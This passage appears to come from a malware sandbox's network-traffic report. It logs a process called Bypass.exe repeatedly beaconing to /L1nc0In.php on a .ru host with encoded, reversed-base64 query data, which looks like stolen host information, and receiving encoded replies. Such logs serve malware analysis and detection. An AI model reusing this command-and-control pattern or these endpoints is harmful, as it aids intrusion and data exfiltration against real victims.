Connection: Keep-Alive
Jun 23, 2024 06:56:22.679023981 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:56:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye
Jun 23, 2024 06:56:22.924010992 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:56:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49773	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:56:27.699659109 CEST	2223	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru
Jun 23, 2024 06:56:28.389945030 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:56:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49774	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:56:33.404398918 CEST	2223	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru
Jun 23, 2024 06:56:34.093904018 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:56:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49775	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:56:39.105926991 CEST	2247	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru Connection: Keep-Alive
Jun 23, 2024 06:56:39.836620092 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:56:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49776	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:56:44.856257915 CEST	2223	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru
Jun 23, 2024 06:56:45.564608097 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:56:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49777	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:56:50.574568987 CEST	2247	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru Connection: Keep-Alive
Jun 23, 2024 06:56:51.263937950 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:56:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49778	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:56:56.277299881 CEST	2247	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru Connection: Keep-Alive
Jun 23, 2024 06:56:56.977318048 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:56:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49779	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:57:02.002727985 CEST	2223	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZ [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru
Jun 23, 2024 06:57:02.705717087 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:57:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye
Jun 23, 2024 06:57:02.943653107 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 Date: Sun, 23 Jun 2024 04:57:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 4e 7a 51 44 4e 34 55 57 4e 31 55 57 5a 6c 56 47 5a 78 49 54 59 79 45 32 4e 7a 51 57 4e 32 4d 44 4f 6a 5a 54 4d 79 59 54 4f 7a 49 79 65 36 49 79 59 6d 4a 47 4f 35 59 32 4e 79 55 32 4e 69 42 6a 4e 6b 4a 47 5a 7a 49 7a 4e 6b 68 7a 4d 6d 64 54 4e 6b 56 32 4d 33 4d 6a 4d 30 49 79 65 Data Ascii: ==Qf9JiI6ISNzQDN4UWN1UWZlVGZxITYyE2NzQWN2MDOjZTMyYTOzIye6IyYmJGO5Y2NyU2NiBjNkJGZzIzNkhzMmdTNkV2M3MjM0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49780	92.53.96.121	80	7004	C:\ProgramData\SoftwareDistribution\Bypass.exe

Timestamp	Bytes transferred	Direction	Data
Jun 23, 2024 06:57:07.715639114 CEST	2220	OUT	GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=0VfiIiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2 [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: ck66916.tw1.ru Connection: Keep-Alive
